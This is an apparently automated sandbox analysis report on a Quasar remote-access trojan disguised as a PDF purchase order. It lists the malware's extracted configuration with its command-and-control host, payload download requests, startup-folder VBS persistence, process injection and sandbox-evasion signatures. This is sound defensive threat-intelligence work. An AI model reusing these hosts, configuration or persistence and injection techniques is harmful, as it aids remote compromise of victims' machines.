Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#83298373729383838392387373873PDF.exe

Overview

General Information

Sample name:PO#83298373729383838392387373873PDF.exe
Analysis ID:1560131
MD5:7c53c51719c6402a25a4facd1e62d01e
SHA1:ed60357adffd36224fda167c12c37c4db539ac47
SHA256:077b69fec403810dcd872d173cb0cb553ece238a4700e0212a2f457fd8446458
Tags:exeuser-lowmal3
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO#83298373729383838392387373873PDF.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe" MD5: 7C53C51719C6402A25A4FACD1E62D01E)
    • InstallUtil.exe (PID: 7116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 2128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Directory.exe (PID: 6236 cmdline: "C:\Users\user\AppData\Roaming\Directory.exe" MD5: 7C53C51719C6402A25A4FACD1E62D01E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "teewire.ydns.eu:2195;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "6f944778-8605-497c-8352-72cfc43e0986", "Tag": "teewire", "LogDirectoryName": "Logs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000000.00000002.2240298776.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO#83298373729383838392387373873PDF.exe.6cf0000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.PO#83298373729383838392387373873PDF.exe.4397590.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                    • 0x28eed8:$x1: Quasar.Common.Messages
                    • 0x29f201:$x1: Quasar.Common.Messages
                    • 0x2ab81a:$x4: Uninstalling... good bye :-(
                    • 0x2ad00f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                    Click to see the 11 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , ProcessId: 2128, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs" , ProcessId: 2128, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-21T12:55:19.064876+010028033053Unknown Traffic192.168.2.649742167.250.5.91443TCP
                    2024-11-21T12:55:21.388749+010028033053Unknown Traffic192.168.2.649751167.250.5.91443TCP
                    2024-11-21T12:55:23.527060+010028033053Unknown Traffic192.168.2.649757167.250.5.91443TCP
                    2024-11-21T12:55:25.679131+010028033053Unknown Traffic192.168.2.649763167.250.5.91443TCP
                    2024-11-21T12:55:27.990266+010028033053Unknown Traffic192.168.2.649769167.250.5.91443TCP
                    2024-11-21T12:55:30.187023+010028033053Unknown Traffic192.168.2.649774167.250.5.91443TCP
                    2024-11-21T12:55:32.379422+010028033053Unknown Traffic192.168.2.649782167.250.5.91443TCP
                    2024-11-21T12:55:34.587668+010028033053Unknown Traffic192.168.2.649788167.250.5.91443TCP
                    2024-11-21T12:55:36.781418+010028033053Unknown Traffic192.168.2.649794167.250.5.91443TCP
                    2024-11-21T12:55:38.920005+010028033053Unknown Traffic192.168.2.649801167.250.5.91443TCP
                    2024-11-21T12:55:41.377908+010028033053Unknown Traffic192.168.2.649806167.250.5.91443TCP
                    2024-11-21T12:55:43.787427+010028033053Unknown Traffic192.168.2.649813167.250.5.91443TCP
                    2024-11-21T12:55:46.224391+010028033053Unknown Traffic192.168.2.649821167.250.5.91443TCP
                    2024-11-21T12:55:48.519190+010028033053Unknown Traffic192.168.2.649827167.250.5.91443TCP
                    2024-11-21T12:55:50.861981+010028033053Unknown Traffic192.168.2.649834167.250.5.91443TCP
                    2024-11-21T12:55:53.006675+010028033053Unknown Traffic192.168.2.649840167.250.5.91443TCP
                    2024-11-21T12:55:55.322109+010028033053Unknown Traffic192.168.2.649847167.250.5.91443TCP
                    2024-11-21T12:55:57.413718+010028033053Unknown Traffic192.168.2.649854167.250.5.91443TCP
                    2024-11-21T12:55:59.554000+010028033053Unknown Traffic192.168.2.649861167.250.5.91443TCP
                    2024-11-21T12:56:01.695594+010028033053Unknown Traffic192.168.2.649868167.250.5.91443TCP
                    2024-11-21T12:56:03.832908+010028033053Unknown Traffic192.168.2.649873167.250.5.91443TCP
                    2024-11-21T12:56:05.977723+010028033053Unknown Traffic192.168.2.649879167.250.5.91443TCP
                    2024-11-21T12:56:08.382481+010028033053Unknown Traffic192.168.2.649886167.250.5.91443TCP
                    2024-11-21T12:56:10.787794+010028033053Unknown Traffic192.168.2.649893167.250.5.91443TCP
                    2024-11-21T12:56:12.926447+010028033053Unknown Traffic192.168.2.649901167.250.5.91443TCP
                    2024-11-21T12:56:15.008643+010028033053Unknown Traffic192.168.2.649906167.250.5.91443TCP
                    2024-11-21T12:56:17.099817+010028033053Unknown Traffic192.168.2.649912167.250.5.91443TCP
                    2024-11-21T12:56:19.188248+010028033053Unknown Traffic192.168.2.649919167.250.5.91443TCP
                    2024-11-21T12:56:21.597410+010028033053Unknown Traffic192.168.2.649925167.250.5.91443TCP
                    2024-11-21T12:56:23.682946+010028033053Unknown Traffic192.168.2.649932167.250.5.91443TCP
                    2024-11-21T12:56:25.875811+010028033053Unknown Traffic192.168.2.649937167.250.5.91443TCP
                    2024-11-21T12:56:28.074541+010028033053Unknown Traffic192.168.2.649944167.250.5.91443TCP
                    2024-11-21T12:56:30.249783+010028033053Unknown Traffic192.168.2.649950167.250.5.91443TCP
                    2024-11-21T12:56:32.730078+010028033053Unknown Traffic192.168.2.649958167.250.5.91443TCP
                    2024-11-21T12:56:35.155641+010028033053Unknown Traffic192.168.2.649964167.250.5.91443TCP
                    2024-11-21T12:56:37.322116+010028033053Unknown Traffic192.168.2.649971167.250.5.91443TCP
                    2024-11-21T12:56:39.515142+010028033053Unknown Traffic192.168.2.649977167.250.5.91443TCP
                    2024-11-21T12:56:41.712807+010028033053Unknown Traffic192.168.2.649985167.250.5.91443TCP
                    2024-11-21T12:56:43.856606+010028033053Unknown Traffic192.168.2.649992167.250.5.91443TCP
                    2024-11-21T12:56:46.011436+010028033053Unknown Traffic192.168.2.649997167.250.5.91443TCP
                    2024-11-21T12:56:48.152065+010028033053Unknown Traffic192.168.2.650004167.250.5.91443TCP
                    2024-11-21T12:56:50.298676+010028033053Unknown Traffic192.168.2.650010167.250.5.91443TCP
                    2024-11-21T12:56:52.493850+010028033053Unknown Traffic192.168.2.650016167.250.5.91443TCP
                    2024-11-21T12:56:55.053084+010028033053Unknown Traffic192.168.2.650027167.250.5.91443TCP
                    2024-11-21T12:56:57.201996+010028033053Unknown Traffic192.168.2.650033167.250.5.91443TCP
                    2024-11-21T12:56:59.494534+010028033053Unknown Traffic192.168.2.650039167.250.5.91443TCP
                    2024-11-21T12:57:01.377052+010028033053Unknown Traffic192.168.2.650045167.250.5.91443TCP
                    2024-11-21T12:57:03.531417+010028033053Unknown Traffic192.168.2.650051167.250.5.91443TCP
                    2024-11-21T12:57:05.670744+010028033053Unknown Traffic192.168.2.650058167.250.5.91443TCP
                    2024-11-21T12:57:07.811223+010028033053Unknown Traffic192.168.2.650064167.250.5.91443TCP
                    2024-11-21T12:57:10.216587+010028033053Unknown Traffic192.168.2.650068167.250.5.91443TCP
                    2024-11-21T12:57:12.319036+010028033053Unknown Traffic192.168.2.650070167.250.5.91443TCP
                    2024-11-21T12:57:14.552418+010028033053Unknown Traffic192.168.2.650072167.250.5.91443TCP
                    2024-11-21T12:57:16.752890+010028033053Unknown Traffic192.168.2.650075167.250.5.91443TCP
                    2024-11-21T12:57:19.096679+010028033053Unknown Traffic192.168.2.650077167.250.5.91443TCP
                    2024-11-21T12:57:22.530041+010028033053Unknown Traffic192.168.2.650081167.250.5.91443TCP
                    2024-11-21T12:57:24.874345+010028033053Unknown Traffic192.168.2.650083167.250.5.91443TCP
                    2024-11-21T12:57:26.966219+010028033053Unknown Traffic192.168.2.650085167.250.5.91443TCP
                    2024-11-21T12:57:30.855047+010028033053Unknown Traffic192.168.2.650089167.250.5.91443TCP
                    2024-11-21T12:57:32.994312+010028033053Unknown Traffic192.168.2.650091167.250.5.91443TCP
                    2024-11-21T12:57:35.143349+010028033053Unknown Traffic192.168.2.650093167.250.5.91443TCP
                    2024-11-21T12:57:37.312458+010028033053Unknown Traffic192.168.2.650095167.250.5.91443TCP
                    2024-11-21T12:57:41.461641+010028033053Unknown Traffic192.168.2.650100167.250.5.91443TCP
                    2024-11-21T12:57:44.994953+010028033053Unknown Traffic192.168.2.650103167.250.5.91443TCP
                    2024-11-21T12:57:47.140055+010028033053Unknown Traffic192.168.2.650105167.250.5.91443TCP
                    2024-11-21T12:57:49.278224+010028033053Unknown Traffic192.168.2.650107167.250.5.91443TCP
                    2024-11-21T12:57:51.456730+010028033053Unknown Traffic192.168.2.650109167.250.5.91443TCP
                    2024-11-21T12:57:54.459415+010028033053Unknown Traffic192.168.2.650112167.250.5.91443TCP
                    2024-11-21T12:57:56.735469+010028033053Unknown Traffic192.168.2.650114167.250.5.91443TCP
                    2024-11-21T12:58:00.079897+010028033053Unknown Traffic192.168.2.650118167.250.5.91443TCP
                    2024-11-21T12:58:03.926683+010028033053Unknown Traffic192.168.2.650121167.250.5.91443TCP
                    2024-11-21T12:58:06.066728+010028033053Unknown Traffic192.168.2.650123167.250.5.91443TCP
                    2024-11-21T12:58:08.262570+010028033053Unknown Traffic192.168.2.650125167.250.5.91443TCP
                    2024-11-21T12:58:10.459800+010028033053Unknown Traffic192.168.2.650127167.250.5.91443TCP
                    2024-11-21T12:58:12.864223+010028033053Unknown Traffic192.168.2.650129167.250.5.91443TCP
                    2024-11-21T12:58:15.112985+010028033053Unknown Traffic192.168.2.650131167.250.5.91443TCP
                    2024-11-21T12:58:17.194955+010028033053Unknown Traffic192.168.2.650133167.250.5.91443TCP
                    2024-11-21T12:58:19.335960+010028033053Unknown Traffic192.168.2.650135167.250.5.91443TCP
                    2024-11-21T12:58:21.780744+010028033053Unknown Traffic192.168.2.650137167.250.5.91443TCP
                    2024-11-21T12:58:23.866583+010028033053Unknown Traffic192.168.2.650139167.250.5.91443TCP
                    2024-11-21T12:58:25.671688+010028033053Unknown Traffic192.168.2.650141167.250.5.91443TCP
                    2024-11-21T12:58:27.946517+010028033053Unknown Traffic192.168.2.650143167.250.5.91443TCP
                    2024-11-21T12:58:30.248570+010028033053Unknown Traffic192.168.2.650145167.250.5.91443TCP
                    2024-11-21T12:58:32.700832+010028033053Unknown Traffic192.168.2.650147167.250.5.91443TCP
                    2024-11-21T12:58:35.084564+010028033053Unknown Traffic192.168.2.650149167.250.5.91443TCP
                    2024-11-21T12:58:37.494509+010028033053Unknown Traffic192.168.2.650151167.250.5.91443TCP
                    2024-11-21T12:58:41.049823+010028033053Unknown Traffic192.168.2.650154167.250.5.91443TCP
                    2024-11-21T12:58:43.133620+010028033053Unknown Traffic192.168.2.650156167.250.5.91443TCP
                    2024-11-21T12:58:45.313091+010028033053Unknown Traffic192.168.2.650158167.250.5.91443TCP
                    2024-11-21T12:58:48.390078+010028033053Unknown Traffic192.168.2.650162167.250.5.91443TCP
                    2024-11-21T12:58:52.287001+010028033053Unknown Traffic192.168.2.650166167.250.5.91443TCP
                    2024-11-21T12:58:55.625819+010028033053Unknown Traffic192.168.2.650171167.250.5.91443TCP
                    2024-11-21T12:58:57.970817+010028033053Unknown Traffic192.168.2.650173167.250.5.91443TCP
                    2024-11-21T12:59:00.160712+010028033053Unknown Traffic192.168.2.650175167.250.5.91443TCP
                    2024-11-21T12:59:02.272862+010028033053Unknown Traffic192.168.2.650177167.250.5.91443TCP
                    2024-11-21T12:59:06.863654+010028033053Unknown Traffic192.168.2.650179167.250.5.91443TCP
                    2024-11-21T12:59:09.009681+010028033053Unknown Traffic192.168.2.650180167.250.5.91443TCP
                    2024-11-21T12:59:11.154776+010028033053Unknown Traffic192.168.2.650182167.250.5.91443TCP
                    2024-11-21T12:59:13.296696+010028033053Unknown Traffic192.168.2.650183167.250.5.91443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: teewire.ydns.euAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "teewire.ydns.eu:2195;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "6f944778-8605-497c-8352-72cfc43e0986", "Tag": "teewire", "LogDirectoryName": "Logs"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Directory.exeReversingLabs: Detection: 23%
                    Multi AV Scanner detection for submitted file
                    Source: PO#83298373729383838392387373873PDF.exeReversingLabs: Detection: 23%
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7116, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Directory.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: PO#83298373729383838392387373873PDF.exeJoe Sandbox ML: detected
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50025 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50027 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50051 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50081 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50088 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50089 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50097 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50098 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50100 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50103 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50112 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50118 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50121 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50143 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50149 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50154 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50162 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50166 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.6:50171 version: TLS 1.2
                    Source: PO#83298373729383838392387373873PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239876609.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239876609.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: teewire.ydns.eu
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49716 -> 208.70.254.118:2195
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
